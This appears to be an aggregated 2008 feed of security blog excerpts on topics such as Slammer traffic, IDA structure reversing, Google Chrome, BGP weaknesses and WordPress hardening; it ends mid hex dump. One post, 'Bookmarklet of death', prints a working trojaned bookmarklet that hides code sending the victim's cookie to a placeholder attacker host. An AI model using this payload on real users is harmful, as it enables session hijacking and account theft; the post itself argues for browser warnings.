September 05, 2008

Contest: Cory Doctorow's Cipher Wheel Rings - Blogs - Schneier On Security

Cory Doctorow wanted a secret decoder wedding ring, and he asked me to help design it. I wanted something more than the standard secret decoder ring, so this is what I asked for: "I want each wheel to be the alphabet, with each letter having either a dot above, a dot below, or no dot at all. The first wheel...

---

ThreatLinQ: Taking Out the Trash - Research - DVLabs

Posted by Mike Dausin
One of the often cited benefits of IPS is the ability to keep ancient attacks from 'polluting' your otherwise pristine network.  The fact is, attacks such as Code Red and SQL Slammer are still out there in force. And while there may be literally a 0% chance of these attacks being successful on a machine in your environment, there is simply no reason to let them into your network. 

Of course, when we tell people this, the first question we often get asked is "are these attacks REALLY out there still?"  The answer is definitely "Yes!"

Take Slammer for instance.  Over the last month, ThreatLinQ has detected no less than 73,300 infected slammer sources which produced tens of millions of packets.  Sure, slammer packets are small, and not likely to cause too much congestion.  But why let Slammer on your network at all, when it can be easily blocked? 

Also, I should also point out that although slammer would never appear on YOUR network (our readers/customers tend to be on the ball,) infections do still occur.  Below is a graph of a host that was clearly infected on 8/22/2008. 



I wonder if the admin of this network has pulled out all his/her hair yet trying to figure out why the net is so slow...

---

Using Shredded Checks as Packaging Material - Blogs - Schneier On Security

This seems like a really dumb idea....

---

Twitter Targeted by Malware Distributors - Blogs - Darknet

This one is of interest to me as I do actually use Twitter as a microblogging service and to keep up with what various friends are up to. It’s quite an interesting wep app especially paired with something like Twitterfox in your browser and Twibble in your mobile phone. It must have made it big now though [...]

Read the full post at darknet.org.uk

---

September 04, 2008

Privacy Policies: Perception vs. Reality - Blogs - Schneier On Security

New paper: "What Californians Understand About Privacy Online," by Chris Jay Hoofnagle and Jennifer King. From the abstract: A gulf exists between California consumers' understanding of online rules and common business practices. For instance, Californians who shop online believe that privacy policies prohibit third-party information sharing. A majority of Californians believes that privacy policies create the right to require a...

---

MindshaRE: Using Structures - Research - DVLabs

Posted by Cody Pierce
This week on MindshaRE we take a quick look at structures. I often see new reverse engineers skipping the creation of structures they encounter when disassembling a binary. While it is true that they can be slightly time consuming to create, the payoff in the end can far outweigh the minimal time investment. The biggest benefit will be during such things as OO method invocation, file format parsing, or packet tracing.  Hopefully the examples I have will convince you to spend those extra 20 minutes defining clean structures next time you run across them in a binary.

MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history.

Everyone knows what a structure is.  A defined container for structured data that will be programmatically accessed.  In a higher level language access to these elements is typically by name, for instance sk_buff->len.  However, in assembly, we have to use an offset from the start of the structure.  This may be where new reverse engineers go cross-eyed. It's easy to understand that accessing sk_buff->len gets the length of the packet data in our structure.  But when you encounter "mov eax, dword ptr [ebx+30h]" things may get a little confusing (Note: I didn't look up the actual offset for sk_buff->len). No need to fret though, assembly can be much easier to understand if we spend time defining structures, and their members, into a more readable form.

First, lets look at the structures window in IDA (Shift+F9).  Opening that up doesn't look to inviting, sans some help text.  Here is what you probably see.

 ; Ins/Del : create/delete structure

 ; D/A/*   : create structure member (data/ascii/array)

 ; N       : rename structure or structure member

 ; U       : delete structure member

If you have loaded symbols you may have some additional structures listed, but in general this window is empty when disassembling a new binary.  The commands should be straight forward.  When we want a new structure we use Ins/Del (Sorry Apple laptops!) to create it.  Doing so will ask us for a name.  There also exist some extra options like "Create before current structure" and "Don't include in the list" which are useful, but in most cases will not be needed.

Before we finish with this window by hitting "OK" click the "Add standard structure" button.  A slew of important data structures should populate the window.  The almost 10k structures listed are for common structures that occur in various SDK's like the Windows Platform SDK.  Choosing one of the structures will automatically add it, and all of its associated members which can be extremely helpful. You can experiment with these later, for now hit "Cancel" and create your new structure. You should get the following.

00000000 example         struc ; (sizeof=0x0)

00000000 example         ends

This is our empty structure.  Not very exciting, so lets add a member. Clicking the top of the example structure and hitting "D" gives us a new field, or member.  The default size of newly created members/fields is one byte.  We can easily change this by selecting the field, and hitting "D" again.  Just like working with data in the disassembly window, repeated "D" keystrokes will cycle this between the supported data types (Byte, Word, Dword).  Also notice the size of the structure will update accordingly.  Let's add a few more just for fun.  Here's mine.

00000000 example         struc ; (sizeof=0x10)

00000000 field_0         dd ?

00000004 field_4         dd ?

00000008 field_8         dd ?

0000000C field_C         db ?

0000000D field_D         db ?

0000000E field_E         db ?

0000000F field_F         db ?

00000010 example         ends

The automatic naming of members is handy.  As you can see they are named according to their offset as well.  For instance field_4 will be "example+4" in assembly.  Let's say that through our reversing efforts we know that example+4 is a dword containing a type.  We can change this name and get that much closer to a readable structure we can use in our disassembly. To achieve this highlight field_4 and hit "N".  This brings up a name window.  Let's put in "type" for the name.

00000000 example         struc ; (sizeof=0x10)

00000000 field_0         dd ?

00000004 type            dd ?

00000008 field_8         dd ?

0000000C field_C         db ?

0000000D field_D         db ?

0000000E field_E         db ?

0000000F field_F         db ?

00000010 example         ends

Fine. We have a structure represented in our structures window.  Now we must use it. One of the most important things to keep in mind when we start to use these structures is to be certain we are applying them correctly.  It does you zero good to apply this example struct to something that is actually an exception handler structure.  Let's pretend this assembly snippet is accessing our newly created structure.

.text:01004130     push    dword ptr [eax+4]

.text:01004133     call    _createnum

This is typical structure access.  Without applying a type to it the argument seems ambiguous.  Let's fix that by highlighting the offset "4" in "eax+4" and hitting "T".  This brings up our defined structures.  You should see the following.



Selecting our example.type member will convert the meaningless "eax+4" into the easily readable assembly below.

.text:01004130     push    [eax+example.type]

.text:01004133     call    _createnum

Creating and applying structures may seem tedious.  But I promise it will make your life much easier when you start applying your newly created structures to your binary. Creating structures can indeed get overwhelming when dealing with large structures.  For instance, creating a structure with over 30 members by hand is a nightmare.  In this case we can automate the task.

#include <idc.idc>

static main()

{

    auto id, rc;

    auto i, count;

    auto sname, oname;

    sname = AskStr("user_struct", "Structure name");

    count = AskLong(64, "Number of dword sized members") / 4;

    id = AddStrucEx(-1, sname, 0);

    for (i=0; i <= count; i++)

    {

        oname = "field_" + ltoa(i * 4, 16);

        rc = AddStrucMember(id, oname, i*4, 0x20000400, -1, 4);

    }

}

Running this will create a structure with your name and number of dword elements.  Writing IDC scripts to define structures can be very powerful.  Lets take another look at a more complex example combining all of these techniques.

Adobe Acrobat's plugin architecture makes extensive use of structures in the form of classes.  Taking a look at the assembly will give you nightmares at night if you do not define and apply structure labels.  Take a look at a small example.

.text:23834076     mov     esi, dword_239345BC

.text:2383407C     mov     eax, dword_2393459C

.text:23834081     add     esi, 18h

.text:23834084     call    dword ptr [eax+600h]

...                

.text:238340A7     movzx   eax, ax

.text:238340AA     mov     [ebp+var_4], eax

.text:238340AD     mov     eax, dword_239345BC

.text:238340B2     push    esi

.text:238340B3     call    dword ptr [eax+30h]

.text:238340B6     add     esp, 24h

.text:238340B9

.text:238340B9 loc_238340B9:

.text:238340B9     mov     eax, dword_23934560

.text:238340BE     call    dword ptr [eax+0Ch]

With nothing labeled this is nonsense.  Fixing up the names and adding structures gives us the following.

.text:23834076     mov     esi, pASExtraHFT

.text:2383407C     mov     eax, pAcroViewHFT

.text:23834081     add     esi, 18h

.text:23834084     call    [eax+s_acroviewHFT.AVAppGetLanguageEncoding] ; AVProcs.h

...                

.text:238340A7     movzx   eax, ax

.text:238340AA     mov     [ebp+var_4], eax

.text:238340AD     mov     eax, pASExtraHFT

.text:238340B2     push    esi

.text:238340B3     call    [eax+s_asextraHFT.ASTextDestroy] ; ASExtraProcs.h

.text:238340B6     add     esp, 24h

.text:238340B9

.text:238340B9 loc_238340B9:

.text:238340B9     mov     eax, pCoreHFT

.text:238340BE     call    [eax+s_coreHFT.ACPopExceptionFrame] ; AcroRd32.ACPopExceptionFrame

Much better.  We can now focus on what this function is doing, instead of the methods it is invoking.  Also notice when we apply a name we get a comment inserted.  You can do this by adding comments to members in your defined structure. All of these names were automatically added to the IDB via a script.  A little research and work before reversing has saved countless hours.

There are many other facets to adding and using structures.  I have touched on their basic usage.  Try to play around with creating structures and applying them to your IDB.  I cant stress enough how important it is when getting into larger projects.  Hope this gave you a good starting point.

-Cody

[UPDATE] I uploaded the vt2st.idc IDC script that Ali mentioned below in the comments.

---

Movie Plot Threats in The Guardian - Blogs - Schneier On Security

We spend far more effort defending our countries against specific movie-plot threats, rather than the real, broad threats. In the US during the months after the 9/11 attacks, we feared terrorists with scuba gear, terrorists with crop dusters and terrorists contaminating our milk supply. Both the UK and the US fear terrorists with small bottles of liquid. Our imaginations run...

---

XTest - VoIP Infrastructure Security Testing Tool - Blogs - Darknet

What is XTest? XTest is a simple, practical, and free, wired 802.1x supplicant security tool implementing the RFC 3847 EAP-MD5 Authentication method. It can be used to assess the password strength within wired ethernet environments that rely on 802.1x to protect IP Phones and the VoIP Infrastructure against rogue PC access. XTest is developed in C...

Read the full post at darknet.org.uk

---

September 03, 2008

Blue Box SE#026 - Astricon 2007 presentation on VoIP security and Asterisk - Podcasts - Blue Box

Synopsis: Blue Box Special Edition #26: Astricon 2007 presentation - "Hacking and Attacking VoIP Systems: What you need to worry about" Welcome to Blue Box: The VoIP Security Podcast Special Edition #26, a 55-minute podcast from Dan York and Jonathan...

---

Diaries Written in Code - Blogs - Schneier On Security

Many throughout history....

---

How To: Detect Cross Site Scripting Vulnerabilities using XSSDetect - WebApp - CGISecurity.com

---

Google releases Chrome Web browser - WebApp - CGISecurity.com

---

Download the 5th Website Security Statistics Report - Blogs - Jeremiah Grossman

Whew, what a mountain of work! I’m ecstatic the complete 5th installment of our Website Security Statistics Report report (all 13-pages) is finally published and available for everyone to see – and comment. I’m also extremely proud that we’re able to capture a measurable improvement in overall website security. Good news from inside InfoSec!? I know, weird huh!? We still have a long way to go, but these statistics show we’re on the right path and doing the right things:

• Find and prioritize all websites
• Find and fix website vulnerabilities
• Implement a secure software development process
• Utilize a defense-in-depth website security strategy
  

Today’s webinar went extremely well, slides are available for those interested. And some quick numbers:

Total Websites: 687
Identified vulnerabilities: 11,234
Unresolved vulnerabilities: 3,541 (66% resolved)
Websites HAVING HAD at least one serious issue: 82%
Websites CURRENTLY WITH at least one serious issue: 61%
Average vulnerabilities per website: 5

The shiny new WhiteHat Top Ten

Yes! CSRF finally make the list!

Also covered is:
- Collection methodology
- Time-to-fix and remediation metrics
- Industry vertical comparisons
- Best practices & lessons learned

Feedback on what other numbers people would like us to report on in the future is very welcome.

---

Sucking Data off of Cell Phones - Blogs - Schneier On Security

Don't give someone your phone unless you trust them: There is a new electronic capture device that has been developed primarily for law enforcement, surveillance, and intelligence operations that is also available to the public. It is called the Cellular Seizure Investigation Stick, or CSI Stick as a clever acronym. It is manufactured by a company called Paraben, and is...

---

Chinese hacker joke…paying the pain forward - Blogs - The Dark Visitor

Got to confess, I don’t get most Chinese humor.  The couple of times I’ve searched for jokes in Chinese hacker forums, this one pops up. Never bothered to tranlate it because it’s bad, very bad.  Somone has taken the time to translate it for me so, without further delay:

Hacker = 黑客 = black rogue(??)~ short for BR
Pc newbie = 小白 = xiao bai ( most probably Ms white) ~ short for XB

A conversation between BR and XB

BR:I am now in control of your PC
XB：How did you do it?
BR：By using a trojan
XB：……………….where？I dont see it
BR：Open your control panels
XB：………………where is my control panels
BR：………………Below your computer!!
XB：I dont see it in “My Computer”
BR：…….Forget it，just forget everything i said

later on~~
BR：I am now in control of your PC again
XB：oh~~
BR： ….scared？！
XB：what good timing，can you help clear those annoying virus? these days there are alot of them in my PC
BR：………..

then……..
XB：why do you always come and go as you please?
BR：well….you could always use a firewall
XB：but…….if there is a firewall, then u wont be able to access my PC
BR：its not that，its just that i wanna have more fun hacking ur PC，if its secureless like this its real damn
boring

If you feel you can’t live without learning the fate of Xiao Bai and the hacker…go here masochist.

---

Korean defense spokseman says stuff guaranteed to come back to haunt him then… - Blogs - The Dark Visitor

Gives valuable stats on Chinese hackers attacks:

According to the Korea Information Security Agency, there were some 2,120 cases of hacking or hacking attempts against various Korean government agencies and entities during the month of March, 2008.

Of them, 53 percent originated from Chinese Internet addresses, while 14 percent came from the United States. Some five percent came from Japanese sources.

I think an International Space Station official said something about having a secure system too…100% hack proof.

---

Productive Botnets - Blogs - Darknet

We all know what botnets are (think so), but anyway let’s see a proper definition of botnets taken from shadowserver… and I quote: A botnet is a collection of computers, connected to the internet, that interact to accomplish some distributed task. Although such a collection of computers can be used for useful and constructive...

Read the full post at darknet.org.uk

---

September 02, 2008

Rethinking the Desktop Model - Blogs - GNUCITIZEN

It is time to rethink the way the desktop works. Some of my ideas may seem radical but sometimes evolution is the only solution to all of our problems. Read on…

I have this idea for quite some time now. Picture the following: a stripped-down Linux kernel with all security mechanisms to the max; levels 2 to 5 configured to run just the most basic set of services such the scheduler, the hardware abstraction and support mechanisms, printing etc., a web server, a browser and the x environment. The low level processes keep the system running while the x, the browser and the web server provide the application layer functionalities.

Each application is hosted on the web server. Technically speaking we have an application server. The browser provides the rendering engine, while the x puts everything on the display. No compilation. Everything is interpreted and under the strict control of the browser and the web server.

The browser is not just the typical browser you will find. Each application opens in its own browser process. It renders just like any other application you may have on your desktop. The only difference is that applications in this environment are written on top of standard, widely-adopted technologies. No dependencies and no cross-platform issues. Applications are easy to patch, extend and control.

The web server is just like any other web server. A module for more granular user control will be required, i.e. different applications will be able to run with different privileges and users should be able to identify themselves without the need to login, etc. Of course, this is only needed if such features are required.

I think that this type of environment will provide more granular control over each application. For example, if an application misbehaves then we can either fix the code on the fly or patch it on the web server with a config hack. We’ve got the technology even to jail the app in a chroot environment. Fixes can be easily implemented at any stage. Because we are using standard technologies, fixes will be easier and more rabust. The browser also provides functionalities to extend its chrome via extensions. Developers can implement a layer on the top of the application layer to provide even greater control, customization and interactivity.

Obviously, because everything becomes a web application, for security reasons, the browser should differentiate between local and remote applications but at the same time make sure that both types are as transparent to the user as possible.

This model is far from being perfect. In fact, it has many flaws. I know that there are even some failed attempts to do something almost similar. However, this model seems so right. It is 2008 and we are still stuck with technologies designed 20 years ago. No wonder why they often break. Perhaps their time has come to an end? I don’t know. Let the crowd decide. I am no longer a perfectionist. My philosophy is: whatever works will be employed to complete the given task. But sometimes I think what it would have been if things were otherwise.

---

Software to Facilitate Retail Tax Fraud - Blogs - Schneier On Security

Interesting: Thanks to a software program called a zapper, even technologically illiterate restaurant and store owners can siphon cash from computer cash registers and cheat tax officials. [...] Zappers alter the electronic sales records in a cash register. To satisfy tax collectors, the tally of food orders, for example, must match the register's final cash total. To hide the removal...

---

Article: SDL Embraces The Web - WebApp - CGISecurity.com

---

Which ASP.NET Controls Automatically HTML Entity Output Encodes? - WebApp - CGISecurity.com

---

Security ROI - Blogs - Schneier On Security

Return on investment, or ROI, is a big deal in business. Any business venture needs to demonstrate a positive return on investment, and a good one at that, in order to be viable. It's become a big deal in IT security, too. Many corporate customers are demanding ROI models to demonstrate that a particular security investment pays off. And in...

---

Google Chrome - Blogs - GNUCITIZEN

It is true what many of you have heard. Google is releasing their own browser. Google Chrome, as they call it, is based on WebKit rendering engine and introduces some novel approaches to interacting with web technologies. I must say, it is very exciting to see all of this happening.

What makes Google Chrome different is its architecture. The browser is no longer single-threaded process. Each tab is actually a separate process with own memspace. I am not sure if we are talking about threads or actual program instances but what is more important is that when you close a tab, you are virtually terminating the process. At least, this is what Google says.

This seams to have some interesting implications on the security of the browser. If you corrupt the tab’s memspace then you will crash only that particular process. The browser and all other tabs should continue working just fine like nothing ever has happened. This approach has its own advantages and disadvantages. The advantages are obvious: the user experience is intact. The disadvantages are that pwning might get easier. It is very early to me to say more on this topic because I haven’t seen Google Chrome in action, but I have the slight suspicion that there will be some security consequences as a result of this security model.

Google Chrome also implements a new privacy feature. I think they call it incognito or something. Basically if you browser while being in incognito mode, nothing ever gets logged. I think that this is a cool feature and I believe that the IE8 team is working on something similar.

Another interesting feature which I need to mention is that popups are not blocked but they open in a minimized window. If you want to see them you just drag the popup icon and there you go. Again, this is very interesting but I can already see how this may be abused. For example, it will make a huge difference if the rendering engine has already processed the content of the popup even if it is minimized. If this is the case, then this feature could turn into a very handy mechanism of hiding malicious activities. For example, if during the attack, the page flickers or the attacker is rendering too many corrupted ANIs :) then certainly, hiding it behind a minimized popup will be a great way of avoiding detection by casual observation. Of course these are pure speculations.

Google Chrome also provides sandboxing functionalities. Apparently each process is sandboxed but I have no details how was that implemented. I would say that perhaps sandboxing JavaScript is fairly easy but doing that on a process level may not be as much. Maybe each process runs with unprivileged account which does not have many rights. But still, it must have some rights in order to do something. So taking over a process may not result into an immediate pwnage but it will certainly give the attackers some advantage. I am very interested to learn how this sandboxing mechanism is implemented for the various operating systems if the browser is cross-platformed of course, which I believe is the case.

If everything is implemented correctly, which I hardly doubt, then Google Chrome may turn into a very nice technology I may consider using it in the near future. However, none of these security features interest me as much as those that allow me to prevent poorly coded web applications leaking my details over unencrypted channels. Or even features which will prevent certain types of CSRF and XSS attacks. I’ve said it before! Most of my data does not reside on my computer any more. Of course this philosophy had some bad side effects on me, but my point is that the data is on the Web and therefore I am concerned how my browser protects me when it comes down to Web related bugs. I believe that Google Chrome lacks mostly that and if they decide to implement any of recommendations then in my eyes, I will certainly have a winner in the upcoming browser wars.

---

September 01, 2008

UK Hacker Gary McKinnon Loses Appeal Against Extradition - Blogs - Darknet

So the latest news with the Gary McKinnon case that was he was trying to fight against Extradition, he started off with Appeals against US Extradition, then he Won The Right to Lords Appeal Extradition Hearing and then he lost the Lords case then went for the European Court. Sadly it seems he lost his appeal [...]

Read the full post at darknet.org.uk

---

Chinese hacker more popular than university president…wins 92% approval rating! - Blogs - The Dark Visitor

Breaking!! Double-edged sword turns out to be…well, double-edged.  A Chinese hacker broke into the Tsinghua University website and left a stinging rebuke of the education system under the university president’s name.  Turned out to be hugely popular, go figure.

GOOD: Standing army ready to fight all your political battles abroad

BAD: Same standing army ready to take you to task domestically

The Web site of the elite Tsinghua University, considered as competitive as Beijing University and even superior in the sciences, was victimized by hackers recently. An article purporting to express the views of the university’s president, Gu Binglin, criticized China’s university education system in harsh and even dirty terms. The majority of Chinese netizens expressed support and understanding toward this unidentified hacker, however.

Throw the hacker in jail? With a 92% approval rating, the university’s president should have kept his mouth shut and hired the kid as a speach writer.

---

My LA Times Op Ed on Photo ID Checks at Airport - Blogs - Schneier On Security

Opinion The TSA's useless photo ID rules No-fly lists and photo IDs are supposed to help protect the flying public from terrorists. Except that they don't work. By Bruce Schneier August 28, 2008 The TSA is tightening its photo ID rules at airport security. Previously, people with expired IDs or who claimed to have lost their IDs were subjected to...

---

August 31, 2008

Let’s fix the Web - Blogs - GNUCITIZEN

I am heavily frustrated from the way the Web works today. Everything seems to be broken beyond reason. I really want to fix the damn thing but I realize that it is not up to me to do that. It is up to all of us to make sure that code is written in the most secure possible way. Can we do that? Perhaps not! What can we do then?

Before I get to the point, I need to tell you how I fixed my insecure Wordpress blog. Wordpress has many security shortcomings and I was so frustrated that I decided to fix whatever I can once and for all. I believe that we can fix the Web in a similar way, but first these are all the patches that were implemented:

1. mark all cookies as secure to prevent leakage over unencrypted channels
2. mark all cookies as httpOnly to prevent session hijacks due to Cross-site Scripting vulnerabilities
3. if you try to login, force SSL to prevent leakage of credentials
4. when logged in, make sure that all URLs are HTTPS enabled to prevent leakage of sensitive information
5. when over HTTPS make sure that all URLs that point to your domain start with https:// to prevent leakage of any data
6. restrict 443 (HTTPS) to blog users and admins only
7. disable error messages everywhere to prevent leakage of sensitive information
8. allow upload of only known file types such as jpg, gif and png (I will add a check for the gifar problem soon)
9. embed an IDS type of solution (PHPIDS in my case) to block known attacks
10. integrate with blogsecurify to enable continues security checks and warn the admin if a problem is found

I believe that this makes the blog a lot more secure. There still might be ways to attack it but this is all I can do in the most reasonable possible way, without completely breaking Wordpress. All of these fixes are implemented as a plugin which I will make available for free download soon.

So how can we fix the Web? I have a few ideas in mind and all of them can be implemented in a plugin. Here they are:

1. allow the user to sandbox and unsandbox applications and web resources with a single click
2. sandbox by default known applications such as GMail, Yahoo Mail, etc.
3. in the sandbox, mark all cookies as secure to prevent session leaks
4. in the sandbox, mark none-session cookies as httpOnly to prevent session hijacks due to XSS
5. make sure that while on HTTPS, all embedded resources are delivered over HTTPS as well.
6. provide the option to turn off JavaScript, JAVA, Flash, SilverLight, etc on per-sandbox basis
7. block any external requests to sandboxed applications
8. implement the PHPIDS signature matching mechanism in JavaScript
9. if the HTML structure is heavily broken, block the page to prevent some types of persistent XSS
10. record ssl signatures on trusted network and warn if signature changes while on untrusted network

I think that this type of solution will make the Web a lot more secure. It definitely wont fix it, but it will make Sidejacking attacks not easy. It will block the majority of CSRF and XSS attacks. It will provide certain mitigations against persistent XSS attacks. It will provide some mitigations against Browser exploits which employ Flash or Java technology to root the browser. It is not perfect, but it looks good enough to me.

Next stop: fixing the browser!

---

August 30, 2008

Bookmarklet of death: Domain hijacking without 0days - Blogs - GNUCITIZEN

So we all know about cross-domain vulnerabilities that allow attackers to run code within the security context of the target domain. Typically, they are either a XSS bug on the server-side application, or a bug in the client (web browser plugin or web browser itself). Most of the times, these vulnerabilities require some type of interaction from the victim user. i.e.: being tricked to click on a link or visit a malicious page.

Now, most techies are familiar with bookmarklets. Well, what’s funny is that many users with knowledge of security - including many infosec professionals - are not aware of the security implications of running a bookmarklet.

The two most common ways to run a bookmarklet are:

• pasting the JavaScript code - which must start with a javascript: statement - in the address bar and press ENTER
• click on the bookmarklet under the ‘Bookmarks’ menu (must have been previously added)

On one hand, a bookmarklet is a piece of JavaScript that allows you to do something cool with the current webpage. On the other hand, from a security point of view, a bookmarklet is scripting code injection within the security context of the current domain/site by design.

Or put it this way: you’ve got the equivalent of a XSS vulnerability in the target site or a cross-domain vulnerability on the web browser. Except that you don’t need to discover a new vulnerability. No 0days required! So like in cross-domain vulnerabilities we can inject payloads that allow us to:

• steal cookies (session hijacking)
• scrape pages containing interesting data and submit it to the attacker’s site
• steal usernames and passwords that are autocompleted by the browser
• perform advanced phishing attacks. i.e.: by overwriting the login form’s action attribute or injecting a new fake login form
• etc …

Also, as in cross-domain vulnerabilities, there is some level of user interaction required: in this case, the attacker must trick the victim to run a bookmarklet while on the target site.

So how can we increase the chance of the victim being tricked to run a bookmarklet? Well, a nice trick is to use a fun and flashy bookmarklet, such as one that reads the images of the current page and creates an animation with them. You could of course write the code from scratch, but we won’t do that as we’re too lazy aren’t we? Instead, we’ll trojan a publicly available (fun and flashy) bookmarklet with our malicious code. In this case, our malicious payload steals the victim’s cookie for the purpose of hijacking his/her session. Notice that the cookies would be sent to x.php which the attacker would need to host on his/her site. This PHP script sends any received data (cookie in this case) to the attacker’s email:

javascript:/*%20start%20of%20evil%20code*/(function(){c=document.createElement("img");c.src="http://evil.domain.foo/x.php?"+document.cookie;c.width=0;c.height=0;document.body.appendChild(c)})();/*end%20of%20evil%20code%20*/window.scrollTo(0,%200);%20R=0;%20x1=.1;%20y1=.05;%20x2=.25;%20y2=.24;%20x3=1.6;%20y3=.24;%20x4=300;%20y4=200;%20x5=300;%20y5=200;%20DI=document.getElementsByTagName(&aposimg&apos);%20DIL=DI.length;%20function%20A(){for(i=0;%20i-DIL;%20i++){DIS=DI[%20i%20].style;%20DIS.position=&aposabsolute'%20DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+&apospx'%20DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+&apospx&apos}R++}setInterval(&aposA()&apos,5);%20void(0);

Notice the malicious payload is within JS comments. There is nothing special about the evil code. It simply creates an image tag which results in the victim’s cookie being sent to a third-party site in the background. The non-malicious payload will also execute, which results in the images of the current page moving around the screen. It’s quite neat, as the user won’t notice anything suspicious actually happened. Needless to say, you need to replace evil.domain.foo with the site hosting the x.php script.

You can picture this kind of attack actually happening in sites where there are cross-user functionalities. i.e.: social networking sites such as Facebook, MySpace and so on …

Thinking about the dangers of running a bookmarklet brings us to the next question:

Why in the world do browsers NOT show a warning before running a bookmarklet?

After all, browsers do display warnings for other potentially dangerous actions such as:

• visiting a site with an invalid SSL certificate
• clicking on a form that submits data in clear

I do understand that it would be annoying to warn users every time they run a bookmarklet, but I think it would be sensible to show a warning at least the first time a given bookmarklet is executed. If you work for a popular web browser vendor such as Microsoft or Mozilla, you can think of this as my wish for the day! I’d love to hear your feedback if you are reading this!

---

Three Letter Acronyms and the Imminent Death of the Net - Research - DVLabs

Posted by Rob King

Years ago, I was much more heavily involved in the network engineering side of the network world. Don't get me wrong, there's still plenty of groveling through packet captures here at TippingPoint's orbiting HQ, but I used to actually design networks and configure routers and do all of the nuts-and-bolts stuff that makes networks run.

As a result of this, I know a reasonable amount about various low-level network protocols, including the wonderful, critical, byzantine, and obscure Border Gateway Protocol (BGP).

BGP is an example of an Exterior Gateway Protocol (EGP), as opposed to an Interior Gateway Protocol (IGP). There, see? That clears things up.

Seriously, though. The difference between interior and exterior gateway protocols is whether they are designed to maintain routing for nodes within an Autonomous Systems (ASes) or nodes between ASes.

An Autonomous System is, well, an autonomous system. It is a network that, at the lowest layer of the Internet, is distinct from all other networks. Basically, an autonomous system is supposed to be entirely responsible for traffic within its borders. If you know in what AS your traffic's destination lives, once it hits that AS, it ceases to be anyone's responsibility but theirs to get that traffic properly routed.

Interior gateway protocols are designed to handle routes within ASes. Common protocols include Open Shortest Pathway First (OSPF), Interior Gateway Routing Protocol (IGRP) and Enhanced Interior Gateway Routing Protocol (EIGRP). These protocols are used to maintain routing tables and figure out the best paths between hosts in one AS - such as between campuses in a large corporation or points-of-presence in a telecommunications network.

EGPs handle the problem of routing traffic between different ASes. For example, a multi-homed host may be reachable via both Time Warner's network and Sprint's network. That means that the multi-homed host is reachable via two autonomous systems. Which route should be chosen to get there?

ASes use EGPs to advertise the ranges of IP addresses that their autonomous system knows how to route to, and how well they can route traffic to them.

The only EGP currently in use is the Border Gateway Protocol. BGP is considered to be the core routing protocol of the Internet; it maintains all of the routes between all of the networks that, together, comprise the modern Internet. It is therefore very important.

Well, BGP was designed in a simpler time, a time when you felt like you could trust your neighbor. Therefore, security wasn't really its strong point. In fact, its security is a major weak point.

What's the point of all this, you may ask? Well, everyone remembers Dan Kaminsky's ginormous DNS flaw that made the rounds and scared a lot of people. Now, an equally-if-not-worse way of exploiting the design of BGP has surfaced, thanks to Alex Polisov and Tony Kapela at this year's just-passed DefCon conference.

I'm not going to go into the details of the attack - I don't want to steal their thunder - but I'll go over a bit why this is scary and interesting.

First off, BGP really is everywhere, just like DNS. Unlike DNS, however, it's not ubiquitously understood - a lot of network administrators have never even heard of BGP, and very few people have ever actually administered BGP. Therefore a flaw in the design of BGP may not be addressed as quickly as a flaw in DNS. Active attacks against the flaw might not even be noticed by most network engineers.

The other thing that makes this interesting is that it's possibly the sign of a true sea change in the way the Internet works. When the Internet first got off of the ground, all of the nodes were more-or-less trusted, and the protocols were designed accordingly. Nowadays, none of the nodes can trust any of the other nodes. The Internet has grown very quickly, but the core protocols have, by necessity, stayed close to their original designs.

The core protocols are going to have to start changing, perhaps more quickly than we're really comfortable with. The Big One - the transition to IPv6, hasn't happened yet, and it will undoubtedly be the worst shakeup the Internet has undergone since the September That Never Ended. Even after that, though, we're going to have to ferret out all of the older protocols, figure out how to secure them, and then - worst of all - go through the long and arduous process of actually securing them.

As an example, look at DNSSEC - the security extensions for DNS, were first publicized in 1997. Still, after 11 years, practically no one has implemented DNSSEC. Certificate-authenticated email transfer is likewise languishing.

All of these efforts failed because as long as one individual in the system is unsecured, the whole thing breaks down. Changing to a completely secure DNS, SMTP, or BGP infrastructure is going to be like the day Sweden switched to driving on the right. It's going to be expensive, it's going to be painful, and it's going to cause some accidents, but in the end, we'll all be better off for it.

---

August 29, 2008

Friday Squid Blogging: Translucent Squid - Blogs - Schneier On Security

Photos here....

---

Understanding the security changes in Flash Player 10 beta - WebApp - CGISecurity.com

---

Another Voting Machine Cartoon - Blogs - Schneier On Security

You know your industry has problems when mainstream comic strips make fun of you....

---

ThreatLinQ: A Brave New World: Legitimate Script Obfuscation - Research - DVLabs

Posted by Marc Eisenbarth

As a filter writer, there is a blurred line between blocking real attacks and Internet annoyances. For example, today's Internet advertisements often use the same obfusction tactics as attackers in order to avoid scrubbing by content filtering systems.

I have been doing some research on Peer-To-Peer (P2P) filters and came across something that illustrates this point very nicely. I came across the following trace that sent to a server that is on one of my IP watch lists:

0000  47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 73 5F 77  GET /cgi-bin/s_w

0010  63 5F 63 6F 72 65 76 33 3F 76 3D 6D 26 74 3D 31  c_corev3?v=m&t=1

0020  20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70   HTTP/1.1..Accep

0030  74 3A 20 2A 2F 2A 0D 0A 52 65 66 65 72 65 72 3A  t: */*..Referer:

0040  20 68 74 74 70 3A 2F 2F 67 61 6D 65 73 2E 73 69   http://games.si

0050  6E 61 2E 63 6F 6D 2E 63 6E 2F 69 66 72 61 6D 65  na.com.cn/iframe

0060  2F 32 30 30 38 2D 30 37 2D 30 39 2F 31 31 36 33  /2008-07-09/1163

0070  2E 73 68 74 6D 6C 0D 0A 41 63 63 65 70 74 2D 4C  .shtml..Accept-L

0080  61 6E 67 75 61 67 65 3A 20 7A 68 2D 63 6E 0D 0A  anguage: zh-cn..

0090  55 41 2D 43 50 55 3A 20 78 38 36 0D 0A 41 63 63  UA-CPU: x86..Acc

00A0  65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A  ept-Encoding: gz

00B0  69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 55 73 65  ip, deflate..Use

00C0  72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61  r-Agent: Mozilla

00D0  2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65  /4.0 (compatible

00E0  3B 20 4D 53 49 45 20 37 2E 30 3B 20 57 69 6E 64  ; MSIE 7.0; Wind

